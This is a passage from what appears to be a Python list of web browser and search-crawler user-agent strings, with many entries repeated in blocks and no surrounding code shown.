'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)',
'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10',
'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)',
'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10',
'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
